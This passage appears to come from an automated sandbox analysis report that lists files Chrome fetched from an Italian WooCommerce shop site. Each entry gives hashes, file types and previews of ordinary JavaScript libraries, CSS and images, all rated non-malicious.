                                                                                                          SHA-256:9FA537147EE009FB58DFEC9A2D76529C79405815435EE9A382ABAA4E422490BE
                                                                                                          SHA-512:5F62CE9347BB6050D1B08E5D562D806179FC36528DF4B1904FE07A01B94DE21B6DEF2CC9CBAD612E55039FA8C87709025513705AE9F8202D1E5C349372679D2E
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:{"fragments":{"div.widget_shopping_cart_content":"<div class=\"widget_shopping_cart_content\">\n <div class=\"ciena-cart-empty-box\">\n <p class=\"woocommerce-mini-cart__empty-icon\"> <svg viewBox=\"0 0 16 16\" class=\" fm-icon fill\">\n <use xlink:href=\"#ico_bag-empty\"><\/use>\n <\/svg>\n <\/p>\n <p class=\"woocommerce-mini-cart__empty-message\">Il tuo carrello \u00e8 vuoto!<\/p>\n <a href=\"https:\/\/annavirgili.com\/shop\/\" class=\"ciena-parent-term-link\" title=\"go to shop\">go to shop <svg viewBox=\"0 0 16 16\" class=\" fm-icon fill\">\n <use xlink:href=\"#ico_next-3\"><\/use>\n <\/svg>\n <\/a> <\/div>\n\n<\/div>",".mini-cart-contents":" <span class=\"mini-cart-contents\">\n <span class=\"count cart-counter\">0 items<span>0<\/span><\/span>\n <\/span>\n "},"cart_hash":""}
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (3129)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):14277
                                                                                                          Entropy (8bit):5.292918573336169
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:xPzCvSMaV0ZATrR09wMmQZcNt3BLQ+Dd9WH+I1wXS0ZgkKtIL2dDmfFVxAVil69k:FzCKMPZATN09o0mtxLbXY+I1rSSdDsFr
                                                                                                          MD5:8690D98E887279F64026F6F97DB7438F
                                                                                                          SHA1:01CB4B5A3F0B9CEE5E36459EEAC2B02C560A19F2
                                                                                                          SHA-256:7755717F7D5E20219FEA67955E1669253F800E5B252E9F16DCC185569AE66882
                                                                                                          SHA-512:90183B42491A4838165B43FCF53C31B7B44E71DD97918D11C0C4CD56E078E8CF69B36E9B662F4AC175245A6D8CEC44FA4EA700F55DEC01F46A9B646496B43B26
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:(function(){. var gt = window.gtranslateSettings || {};. gt = gt[document.currentScript.getAttribute('data-gt-widget-id')] || gt;.. var lang_array_english = {"af":"Afrikaans","sq":"Albanian","am":"Amharic","ar":"Arabic","hy":"Armenian","az":"Azerbaijani","eu":"Basque","be":"Belarusian","bn":"Bengali","bs":"Bosnian","bg":"Bulgarian","ca":"Catalan","ceb":"Cebuano","ny":"Chichewa","zh-CN":"Chinese (Simplified)","zh-TW":"Chinese (Traditional)","co":"Corsican","hr":"Croatian","cs":"Czech","da":"Danish","nl":"Dutch","en":"English","eo":"Esperanto","et":"Estonian","tl":"Filipino","fi":"Finnish","fr":"French","fy":"Frisian","gl":"Galician","ka":"Georgian","de":"German","el":"Greek","gu":"Gujarati","ht":"Haitian Creole","ha":"Hausa","haw":"Hawaiian","iw":"Hebrew","hi":"Hindi","hmn":"Hmong","hu":"Hungarian","is":"Icelandic","ig":"Igbo","id":"Indonesian","ga":"Irish","it":"Italian","ja":"Japanese","jw":"Javanese","kn":"Kannada","kk":"Kazakh","km":"Khmer","ko":"Korean","ku":"Kurdish (Kurm
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:data
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):9141
                                                                                                          Entropy (8bit):5.2975271144294185
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:s6zoFrnW4iaX3LzDk1jpJLB2hlq717+3uClD2tFtJ7bykd+SHS+F:s6Udn3LzoJphH8uClD2tFtJ7byTwtF
                                                                                                          MD5:A8127C1A87BB4F99EDBEEC7C37311DCD
                                                                                                          SHA1:9997A1745F48BDD233DBE9BD8164DAA53EBA105B
                                                                                                          SHA-256:F313D12EA6124BD28FC4A6B7163D253BB83D5AEAB5EDCE594880C5C3DF475CBC
                                                                                                          SHA-512:AA10DDC5B29905C60A058FAED3F5F195F7577CEAC46489E02461B5135732194DAA3AEF4AA473127BF8C753312E02074CFDAC8D0F8F0CC8AA544C7F8E02BEBD08
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6
                                                                                                          Preview:/*! This file is auto-generated */.(()=>{var t={2058:(t,e,r)=>{var n;!function(){"use strict";var i={not_string:/[^s]/,not_bool:/[^t]/,not_type:/[^T]/,not_primitive:/[^v]/,number:/[diefg]/,numeric_arg:/[bcdiefguxX]/,json:/[j]/,not_json:/[^j]/,text:/^[^\x25]+/,modulo:/^\x25{2}/,placeholder:/^\x25(?:([1-9]\d*)\$|\(([^)]+)\))?(\+)?(0|'[^$])?(-)?(\d+)?(?:\.(\d+))?([b-gijostTuvxX])/,key:/^([a-z_][a-z_\d]*)/i,key_access:/^\.([a-z_][a-z_\d]*)/i,index_access:/^\[(\d+)\]/,sign:/^[+-]/};function a(t){return function(t,e){var r,n,o,s,l,u,p,c,f,d=1,h=t.length,g="";for(n=0;n<h;n++)if("string"==typeof t[n])g+=t[n];else if("object"==typeof t[n]){if((s=t[n]).keys)for(r=e[d],o=0;o<s.keys.length;o++){if(null==r)throw new Error(a('[sprintf] Cannot access property "%s" of undefined value "%s"',s.keys[o],s.keys[o-1]));r=r[s.keys[o]]}else r=s.param_no?e[s.param_no]:e[d++];if(i.not_type.test(s.type)&&i.not_primitive.test(s.type)&&r instanceof Function&&(r=r()),i.numeric_arg.test(s.type)&&"number"!=typeof r&&
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (729)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):917
                                                                                                          Entropy (8bit):5.161151260228662
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:UOoGf7y3RbdLhPb/f7ysKIUMbH4J4ZkBkeHl9fmMYbyEvYw8S2DycjfWBYiqAUS0:No1NhbmSH4J4apHlTY+8875kFUN3p
                                                                                                          MD5:D1FFC66DD708F7380284F4A6EAA72BD6
                                                                                                          SHA1:70F0B432E95E80E12E497A7A8DB41D966498D8BC
                                                                                                          SHA-256:F543270843C5B8DC38E2A5EED2DF19603AC1CF30CED537BC8621520AC9FAE7A9
                                                                                                          SHA-512:521D7461036C2319D26ABB61CD74F6C800EB10BED26C2EC058D6B3C8D13754ADE74A73EB5FF970ABAAB730BF4DA63D81EC1F1D31245352519D98B9FFFAAB77BC
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-includes/js/jquery/ui/effect-slide.min.js?ver=1.13.3
                                                                                                          Preview:/*!. * jQuery UI Effects Slide 1.13.3. * https://jqueryui.com. *. * Copyright OpenJS Foundation and other contributors. * Released under the MIT license.. * https://jquery.org/license. */.!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery","../version","../effect"],e):e(jQuery)}(function(d){"use strict";return d.effects.define("slide","show",function(e,t){var i,o,n=d(this),c={up:["bottom","top"],down:["top","bottom"],left:["right","left"],right:["left","right"]},s=e.mode,f=e.direction||"left",l="up"===f||"down"===f?"top":"left",p="up"===f||"left"===f,r=e.distance||n["top"==l?"outerHeight":"outerWidth"](!0),u={};d.effects.createPlaceholder(n),i=n.cssClip(),o=n.position()[l],u[l]=(p?-1:1)*r+o,u.clip=n.cssClip(),u.clip[c[f][1]]=u.clip[c[f][0]],"show"===s&&(n.cssClip(u.clip),n.css(l,u[l]),u.clip=i,u[l]=o),n.animate(u,{queue:!1,duration:e.duration,easing:e.easing,complete:t})})});
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):707
                                                                                                          Entropy (8bit):7.4201500949823735
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:6v/7m/6TziQEG1npPuoJYKJQ0Ghr0bPwFl95XCHKCHMnsaldS05vCIO59aYdp1Z0:b/6XsanZJeeehrJ/bXCHvMZlc05vCd5q
                                                                                                          MD5:E4896565595FC22E344FD619C0ED15BB
                                                                                                          SHA1:43D4481A4CC3E60B406B2467B5F7E576FCBAE260
                                                                                                          SHA-256:C3A4CB8F32EF0CD89E6429D40D1FAEBD359E02E34D69764052C8402A391E9A00
                                                                                                          SHA-512:0AB96B0D29EEB56D1BBEF4017DD039701FA85775F50F6B9DCD50FC0D8853228F1AD1FD9A4593D5CF9CE521CF84C31145C10A99588C2D243E114400723E02549C
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/gtranslate/flags/16/en.png
                                                                                                          Preview:.PNG........IHDR................a....pHYs................ cHRM..z%..............u0...`..:....o._.F...IIDATx..]H.Q...g{.95..1....b$.0$.f.}..IE.fA]D.E`..^....J.....R".r..Q.....1?&.........]....s........BJ.j$.+..<W.80.......-..y4l.....c1^<.g..e.Tr...pc7.......(.kIufg+@Z......rbo)E.j.{....}.v.tL6.e{\..Q.gc....W.i.`..=..E.L.......=.......'4..".ef.*v.......`.@.Lp..fCj..!..\.U'...8......7mU.~.m$5.....H.f.HI.............q...b.'"h.)D...#..`.*...........K.....de%+..pW"...._..|Axr....J<....ZHy.....Y.H..%0o%.OM.x.)...0...N...........}.'.......:.w.Qq.Cg.8.k........e...:...U..6.....8y.&.?.....Zvh....KgX..@dq.A...;]HM#...w$.@....j.........@..f.Y....`N..B....j..w.....kXp7....IEND.B`.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (6495), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):6495
                                                                                                          Entropy (8bit):4.754165645836853
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:54hhW/R5uj4ib5iet6hN3gN6ro8poDopJioeSJM482R8Vbog9nGftinQ4CPJP7mS:54ORI4iVhsgN6EGpJJgR2RcoR
                                                                                                          MD5:B15EF24270546E5FE896D3EA387EA134
                                                                                                          SHA1:63910103E8CC5E4BDEB2C289CFBF41F89966EA5B
                                                                                                          SHA-256:41CE2509FA9959868717986010E16B6334885FD46BC64D0D3C745A73ED3C41E4
                                                                                                          SHA-512:470850CE2D0487067D847B35F12A8CEC80AA5BF307FC1D7B3E8BA1742BB369441811DC764B858F82484B7993EF1ABD8A6F51489B881A21B3091B066DC4308B40
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/tooltip/css/tooltipster.bundle.min.css?ver=3.3.0
                                                                                                          Preview:.tooltipster-fall,.tooltipster-grow.tooltipster-show{-webkit-transition-timing-function:cubic-bezier(.175,.885,.32,1);-moz-transition-timing-function:cubic-bezier(.175,.885,.32,1.15);-ms-transition-timing-function:cubic-bezier(.175,.885,.32,1.15);-o-transition-timing-function:cubic-bezier(.175,.885,.32,1.15)}.tooltipster-base{display:flex;pointer-events:none;position:absolute}.tooltipster-box{flex:1 1 auto}.tooltipster-content{box-sizing:border-box;max-height:100%;max-width:100%;overflow:auto}.tooltipster-ruler{bottom:0;left:0;overflow:hidden;position:fixed;right:0;top:0;visibility:hidden}.tooltipster-fade{opacity:0;-webkit-transition-property:opacity;-moz-transition-property:opacity;-o-transition-property:opacity;-ms-transition-property:opacity;transition-property:opacity}.tooltipster-fade.tooltipster-show{opacity:1}.tooltipster-grow{-webkit-transform:scale(0,0);-moz-transform:scale(0,0);-o-transform:scale(0,0);-ms-transform:scale(0,0);transform:scale(0,0);-webkit-transition-property:
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (375), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):375
                                                                                                          Entropy (8bit):5.099726776601618
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:CRh6hQp8mgO9lVBc9kZUXXRnBEK9EJ1lLBKWP50ksaJObChQp8mgO9lVhnhw3wQ5:shPCurHZAE8knKATskOLCuHniaUjenKZ
                                                                                                          MD5:1EA1DE5C96844259529FF4C5F7A1F8AA
                                                                                                          SHA1:D97E411804B674D826245B205B661112117FD9EF
                                                                                                          SHA-256:2F59A26AD63F459E6C627F75609FA938456F24B1CD0EF8B27770165E9A76420D
                                                                                                          SHA-512:EC9D187A7F722B3EFFC19FE7E06A41702008A1567C7CD2E767650224068055F8ED364C9726EE4885C31EA6666DA3678C48565CDDAC6C0E2A4A1B44C855E89158
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:if(function(){let e=document.createElement("div");e.innerHTML="<div style='display:flex;flex-direction:column;gap:1px;'><div></div><div></div></div>",document.body.appendChild(e);let t=1===e.scrollHeight;return e.remove(),!t}()||window._testFB){let e=document.createElement("script");e.setAttribute("src","/wp-content/uploads/fgfallback.min.js"),document.body.appendChild(e)}
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (41067)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):41171
                                                                                                          Entropy (8bit):5.038063560031163
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:Ls4TfJuknYrmL1+y3y2yVRRV7Ry2ySx76gVMu9FdopOyqKy+gyIpKQPmchIUUe8a:w4TtQObixPRix076gVMAAESuPqUUe8a
                                                                                                          MD5:B5C1F83E8E2C9FAD4A9C7A7E8C34B2FA
                                                                                                          SHA1:A1C7A35489061767940A66B546466FF5212A4625
                                                                                                          SHA-256:67ADFDAC93B9EC1899CD00E55AC1B217E109DC5B379C3E2940F91F8A64F2DD2F
                                                                                                          SHA-512:919B2ABE6C3DE18F21CA1C2D59926F0EDA1BC10F692E11750EE22F72A4AEADA71B467E9626CD4887ED387E91FFF1DD4214ACACA7B5C0D6D47401ADA328B4D052
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:// Ion.RangeSlider, 2.3.1, . Denis Ineshin, 2010 - 2019, IonDen.com, Build date: 2019-12-19 16:56:44.!function(i){"undefined"!=typeof jQuery&&jQuery||"function"!=typeof define||!define.amd?"undefined"!=typeof jQuery&&jQuery||"object"!=typeof exports?i(jQuery,document,window,navigator):i(require("jquery"),document,window,navigator):define(["jquery"],function(t){return i(t,document,window,navigator)})}(function(a,c,l,t,_){"use strict";var i,s,o=0,e=(i=t.userAgent,s=/msie\s\d+/i,0<i.search(s)&&s.exec(i).toString().split(" ")[1]<9&&(a("html").addClass("lt-ie9"),!0));Function.prototype.bind||(Function.prototype.bind=function(o){var e=this,h=[].slice;if("function"!=typeof e)throw new TypeError;var r=h.call(arguments,1),n=function(){if(this instanceof n){var t=function(){};t.prototype=e.prototype;var i=new t,s=e.apply(i,r.concat(h.call(arguments)));return Object(s)===s?s:i}return e.apply(o,r.concat(h.call(arguments)))};return n}),Array.prototype.indexOf||(Array.prototype.indexOf=function(t,i
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 3236 x 1388, 8-bit/color RGBA, non-interlaced
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):80326
                                                                                                          Entropy (8bit):7.390901813388901
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:DZsgLIxfTtNJcXhR9JXoM6p86lFsbUA7mv+1CRiZ4rp:dsgLgfTnJcXDotDDAqm+Rrp
                                                                                                          MD5:98998B57EB1F0DE182C02C2E75EFAF64
                                                                                                          SHA1:F70C279E5D402D390386C6176EE9E565025204F7
                                                                                                          SHA-256:D5AA63FF567C73262121562408F3EFE1BC90EEB71EE59AE995452B82C7709B86
                                                                                                          SHA-512:A915F90F3F516631B8EAF7227DD56C6C0CBD9B3CCE40424D8AFA492D8A22E07C22555F6C956FB8DB151C33F0669E58AFF65DE2B765A829D5890303721D8B9868
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/uploads/2021/08/logo.png
                                                                                                          Preview:.PNG........IHDR.......l......,......bKGD..............pHYs...#...#.x.?v....tIME..... q.T.. .IDATx....q,G.....z.<......`...@...,...X ..Jx.X ..E[p.0...wH...;.../bc#...sNe..,...............U.P..............!..............Y.R............8.@.............g.H.............,.).............E ............................p................"..............Y.R............8.@.............g.H.............,.).............E ............................p................"..............Y.R............8.@.............g.H.............,.).............E ............................p................"..............Y.R............8.@.............g.H.............,.).............E ............................p................"..............Y.R............8.@.............g.H.............,.).............E ............................p................"..............Y.R............8.@.............g.H.............,.).............E ............................p................"..............Y.R............8.@......
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (31915)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):39773
                                                                                                          Entropy (8bit):5.129384739656525
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:VF14PRTj2hFH9LVAyFbPmyge7ggCn9Ql3MKLhFIAKU4iqZDA1nuNlg3ALvPoLuSM:kmv/AyFsU4imDAGtl
                                                                                                          MD5:FC1812C205C79CC9DBB4B9E8D4335226
                                                                                                          SHA1:B5346EA70F811295DF4227638324BA66B2B108CC
                                                                                                          SHA-256:C1AFB0DA1D792306039017751FD405AC18E034061A19A1B1170074F66A4714AA
                                                                                                          SHA-512:9CFB182ED6F05FED5CCEA61B342CE24FC5BFC6A2944C092E34DF3FAE74D14879AF1FC40471633B407BDA3B92B9D39A826AAE20CA4FE357476C9F95C079B831DE
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/tooltip/js/tooltipster.bundle.min.js?ver=3.3.0
                                                                                                          Preview:"use strict";.!function(a,b){"function"==typeof define&&define.amd?define(["jquery"],function(a){return b(a)}):"object"==typeof exports?module.exports=b(require("jquery")):b(jQuery)}(this,function(a){function b(a){this.$container,this.constraints=null,this.__$tooltip,this.__init(a)}function c(b,c){var d=!0;return a.each(b,function(a,e){return void 0===c[a]||b[a]!==c[a]?(d=!1,!1):void 0}),d}function d(b){var c=b.attr("id"),d=c?h.window.document.getElementById(c):null;return d?d===b[0]:a.contains(h.window.document.body,b[0])}function e(){if(!g)return!1;var a=g.document.body||g.document.documentElement,b=a.style,c="transition",d=["Moz","Webkit","Khtml","O","ms"];if("string"==typeof b[c])return!0;c=c.charAt(0).toUpperCase()+c.substr(1);for(var e=0;e<d.length;e++)if("string"==typeof b[d[e]+c])return!0;return!1}var f={animation:"fade",animationDuration:350,content:null,contentAsHTML:!1,contentCloning:!1,debug:!0,delay:300,delayTouch:[300,500],functionInit:null,functionBefore:null,functionRea
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):1167
                                                                                                          Entropy (8bit):4.704672144708603
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:7G8++Yzc1pWMAmM2lilX3b1MWE6FQIvQkiUfutDXYCRGR24EaqaHZv:7G8+RNKFilb1jBhQkilYCRGXnNv
                                                                                                          MD5:AC759E0CC91B5A81999C481AB8EC7C71
                                                                                                          SHA1:27FAFA683ADF684F70EA3758F19430C17DCE2451
                                                                                                          SHA-256:04C32A0BBF5F05F007948D07C96A980A9BDB029BEAEFE6CAAB17C982F97F70A4
                                                                                                          SHA-512:663842DCB931125AC09AB8BEEC6FDCB3C433F6A322FE6C4E950598815FAAF6D3E93D16F4508250C8A4ADF576A4696516F97C480EC5F37486A695ECD8E3755B5E
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/html_types/select.js?ver=3.3.0
                                                                                                          Preview:"use strict";.function woof_init_selects() {. . if (woof_select_type == 'chosen') {..jQuery("select.woof_select, select.woof_price_filter_dropdown").chosen();. } else if (woof_select_type == 'selectwoo') {..jQuery("select.woof_select, select.woof_price_filter_dropdown").selectWoo();. }.. jQuery('.woof_select').change(function () {. var slug = jQuery(this).val();. var name = jQuery(this).attr('name');. woof_select_direct_search(this, name, slug);. });.. var containers = jQuery('.woof_hide_empty_container');. jQuery.each(containers, function(i, item){..var selector= jQuery(item).val();..if(selector){.. jQuery(selector).hide();..}... });. .}..function woof_select_direct_search(_this, name, slug) {.. jQuery.each(woof_current_values, function (index, value) {. if (index == name) {. delete woof_current_values[name];. return;. }. });.. if (slug != 0) {. woof_current_values[name] = slug;.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 7680 x 4321, 8-bit/color RGBA, non-interlaced
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):2768735
                                                                                                          Entropy (8bit):7.612214171991631
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:49152:4mOG34LIO4yW9q8noy68AH/hqKsov9TrbVNMyBTI46bsoIDOCBQYIToxh9Kl2KBc:4OOT4L9q8no8A5qFov9TrhNMyBkrbDwh
                                                                                                          MD5:70C2D73BD92BDD0CD5C245D5A969DB10
                                                                                                          SHA1:663487CB9B4E5A33C0B1A53511F5D2DCD0EC1FFC
                                                                                                          SHA-256:B5324B4AEBAE05525F9056FA04A3FE3EB7287E83F376B272EC9ADBCA3C2B58D5
                                                                                                          SHA-512:A9A801765DC83D0A60581092204D416CD9C7FA041C65D6762EB13F0802F9E8DF43C7DCDB42BDBC447805BE0D6800B627A29F6E9BD335BDA016AD9FC8D0D7F9A4
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/uploads/2024/09/Asset-5@4x.png
                                                                                                          Preview:.PNG........IHDR.............}..6....pHYs..,J..,J.wztM.. .IDATx...[v.:.(XKk......g..SU.*...H<e..'..@.oB../...............................?....~...|..p}..@..z...~..........xA...N....G...7.............ze?.....J..9fg.0....7.~..Y......W..Pz..c.f...g..1....I~............^..GL.}ul..`x.?/.....B....c{....>g.7.7Y...b... i.....W..........?I.........#.G.~.....&......|....X.....{.../.....by...%...I..........y.<R..c~4..>?..e[^.......X.l......d.c<?.N.&...1f_V?..n..p}2>...os..c...W,..Y.Z.Q..x.M.I|MyI..l~.l...............O.|..m;}J...f.}.?..z.*^.z.n.W.?;?.>.?~~>........+{..|T.s5........mo..U.....].2...ht.Y.o.F...Kf...V....P._...:z..[.3...Y.Y}...kw}^..z.{o..Zo.{.Go}...m...Woy.}..|.w<.;^.........6{.jt......~G.w.......f..F......F.....=...?...ef.oso.zro...=..Z.......6z.`.z...Nfu.....qv........O./v......c..z.?.._.....{.....Cz..}...........6.X.c}...G../.^...;.jx...,=..kz..~st}kZ..~f.G.....[:.|./.|?2.o....F.wg...n.N[..:m}+}>M.....V.....V._..K.....sE...D...fz.{.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (729)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):917
                                                                                                          Entropy (8bit):5.161151260228662
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:UOoGf7y3RbdLhPb/f7ysKIUMbH4J4ZkBkeHl9fmMYbyEvYw8S2DycjfWBYiqAUS0:No1NhbmSH4J4apHlTY+8875kFUN3p
                                                                                                          MD5:D1FFC66DD708F7380284F4A6EAA72BD6
                                                                                                          SHA1:70F0B432E95E80E12E497A7A8DB41D966498D8BC
                                                                                                          SHA-256:F543270843C5B8DC38E2A5EED2DF19603AC1CF30CED537BC8621520AC9FAE7A9
                                                                                                          SHA-512:521D7461036C2319D26ABB61CD74F6C800EB10BED26C2EC058D6B3C8D13754ADE74A73EB5FF970ABAAB730BF4DA63D81EC1F1D31245352519D98B9FFFAAB77BC
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*!. * jQuery UI Effects Slide 1.13.3. * https://jqueryui.com. *. * Copyright OpenJS Foundation and other contributors. * Released under the MIT license.. * https://jquery.org/license. */.!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery","../version","../effect"],e):e(jQuery)}(function(d){"use strict";return d.effects.define("slide","show",function(e,t){var i,o,n=d(this),c={up:["bottom","top"],down:["top","bottom"],left:["right","left"],right:["left","right"]},s=e.mode,f=e.direction||"left",l="up"===f||"down"===f?"top":"left",p="up"===f||"left"===f,r=e.distance||n["top"==l?"outerHeight":"outerWidth"](!0),u={};d.effects.createPlaceholder(n),i=n.cssClip(),o=n.position()[l],u[l]=(p?-1:1)*r+o,u.clip=n.cssClip(),u.clip[c[f][1]]=u.clip[c[f][0]],"show"===s&&(n.cssClip(u.clip),n.css(l,u[l]),u.clip=i,u[l]=o),n.animate(u,{queue:!1,duration:e.duration,easing:e.easing,complete:t})})});
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38464
                                                                                                          Entropy (8bit):4.6629541485587
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:70xoyX6PmEmcx2dCYxYYFOjJA0t4zwZVjL/:oxoA6OEmcLpyqVjj
                                                                                                          MD5:502B178B099ED4D72DB251553C569536
                                                                                                          SHA1:9CA686DE040692233D0B7213F26A7EDF3A130B7B
                                                                                                          SHA-256:8CA6D9CC1522A42C3F686EBB206F9820F3C53EF4A419D28455C0FBB31400F986
                                                                                                          SHA-512:E1E8DA37C3366176C9ECA54FD770DA092D1F64EA0D0943EE92A38CBA6AFCAF7D97CF5FF6C11C389C2289ACD993C6CB5F1F919FDA82DEDBB62900F890AF63A74D
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*!. * perfect-scrollbar v1.5.0. * Copyright 2020 Hyunje Jun, MDBootstrap and Contributors. * Licensed under MIT. */..(function (global, factory) {. typeof exports === 'object' && typeof module !== 'undefined' ? module.exports = factory() :. typeof define === 'function' && define.amd ? define(factory) :. (global = global || self, global.PerfectScrollbar = factory());.}(this, (function () { 'use strict';.. function get(element) {. return getComputedStyle(element);. }.. function set(element, obj) {. for (var key in obj) {. var val = obj[key];. if (typeof val === 'number') {. val = val + "px";. }. element.style[key] = val;. }. return element;. }.. function div(className) {. var div = document.createElement('div');. div.className = className;. return div;. }.. var elMatches =. typeof Element !== 'undefined' &&. (Element.prototype.matches ||. Element.prototype.webkitMatchesSelector ||. Element.prototype.mozMatchesSele
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (2938), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2938
                                                                                                          Entropy (8bit):4.989368196764261
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:oiu6oNl0R9SxGkYK2ITm5mej11i/nOrIkX6OLbf1i/u/apqWt01i/qXR4yQENlF0:c2rBBL6Yw/U5Fe
                                                                                                          MD5:0FD625C3991A4015814CFFDC88E2FC82
                                                                                                          SHA1:D7C2F53E058210FF3EA773297641008BAB71A5F3
                                                                                                          SHA-256:2D022DB650D194D935FAEA46A40E5512235B43BC3F8B181E32CE6D3DD745F4E1
                                                                                                          SHA-512:B936B4E596739DE1FA708A9F439167D4C2E670228A88A803363AA65F061B29DD9F52FDCD5AAB1C1DCBBC634A779E54F767640B2BAF30025130B5EA4FC6169631
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:jQuery(function(r){if("undefined"==typeof wc_cart_fragments_params)return!1;var t=!0,o=wc_cart_fragments_params.cart_hash_key;try{t="sessionStorage"in window&&null!==window.sessionStorage,window.sessionStorage.setItem("wc","test"),window.sessionStorage.removeItem("wc"),window.localStorage.setItem("wc","test"),window.localStorage.removeItem("wc")}catch(f){t=!1}function a(){t&&sessionStorage.setItem("wc_cart_created",(new Date).getTime())}function s(e){t&&(localStorage.setItem(o,e),sessionStorage.setItem(o,e))}var e={url:wc_cart_fragments_params.wc_ajax_url.toString().replace("%%endpoint%%","get_refreshed_fragments"),type:"POST",data:{time:(new Date).getTime()},timeout:wc_cart_fragments_params.request_timeout,success:function(e){e&&e.fragments&&(r.each(e.fragments,function(e,t){r(e).replaceWith(t)}),t&&(sessionStorage.setItem(wc_cart_fragments_params.fragment_name,JSON.stringify(e.fragments)),s(e.cart_hash),e.cart_hash&&a()),r(document.body).trigger("wc_fragments_refreshed"))},error:func
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                          Category:dropped
                                                                                                          Size (bytes):43
                                                                                                          Entropy (8bit):2.7374910194847146
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:CU9yltxlHh/:m/
                                                                                                          MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                          SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                          SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                          SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:GIF89a.............!.......,...........D..;
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (8189)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):21464
